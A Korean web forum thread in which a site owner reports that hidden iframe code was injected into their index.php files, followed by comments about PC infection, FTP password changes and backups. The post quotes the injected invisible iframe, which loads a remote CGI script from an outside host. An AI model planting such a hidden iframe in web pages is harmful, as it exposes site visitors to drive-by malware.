남에 일인줄만 알았는데, 이게 해킹당한건가요?
오늘 낮에 운영중인 사이트 2개가 접속안되고 에러뜨길래
index.php 파일을 보니까 이상한 코드가 들어가 있더라고요. - -
<iframe src="http://a86x.homeunix.org:8080/ts/in.cgi?open2" width=346 height=0 style="visibility: hidden"></iframe>
파일명이 index 또는 main 들어간거는 무조건 심어져 있더군요..
그래서 pc바이러스 검사해서 뜨는거 치료하고, ftp접속 비번 바꾸고, db 비번 바꾸고 하니까
좀 마음이 놓이네요..
사람이 하는짓 같지는 않고, 악성 프로그램에 노출되었을때 자동으로 저런 현상이 일어나는거 같은데 맞나요??
해결하고도 찝찝해서 알약, 각 은행 바이러스,악성코드검사 다해보았네요..ㅜㅜ
index.php 파일을 보니까 이상한 코드가 들어가 있더라고요. - -
<iframe src="http://a86x.homeunix.org:8080/ts/in.cgi?open2" width=346 height=0 style="visibility: hidden"></iframe>
파일명이 index 또는 main 들어간거는 무조건 심어져 있더군요..
그래서 pc바이러스 검사해서 뜨는거 치료하고, ftp접속 비번 바꾸고, db 비번 바꾸고 하니까
좀 마음이 놓이네요..
사람이 하는짓 같지는 않고, 악성 프로그램에 노출되었을때 자동으로 저런 현상이 일어나는거 같은데 맞나요??
해결하고도 찝찝해서 알약, 각 은행 바이러스,악성코드검사 다해보았네요..ㅜㅜ
|
댓글을 작성하시려면 로그인이 필요합니다.
로그인
댓글 7개
사이트 백업 주기적으로 하세요~
저두 당했는데 아직도 불안 불안. 일단 한국ip만 되도록 극약처방으로 했지만, 향후에 해외ip open
했을때 어찌될지...
검색을 해보니 대부분 컴퓨터가 먼저 바이러스가 걸리고 나서 .. 심어 지는거라고 하던데
웹상에서 해킹을 당하는게 아니라요 ^^;;
먼저 자기 PC에 있는 벌러지 싹~ 잡아죽이고, ftp비번 변경해 주니까 괜찮은거 같습니다.
index.php는 물론이고 bbs/login.php,adm/index.php등 여러곳에 심어 놓습니다.
알*,메가닥*.등 여러가지로 해봤는데 그중 avast가 치료와 방어가 좀 되는거 같습니다.
아까 처음에 사이트접속안되고 느낌 이상할때, 유아원님 캐릭터처럼 가슴이 콩닥거렸다니까요ㅎㅎ
이제부터는 시간날때마다 주기적으로 db백업 해두려고요.. 후암...
디비는 매일 새벽 4시에 서버에서 자동으로 하고 있습니다.
언제라도 복구가 가능하게끔이요. ^^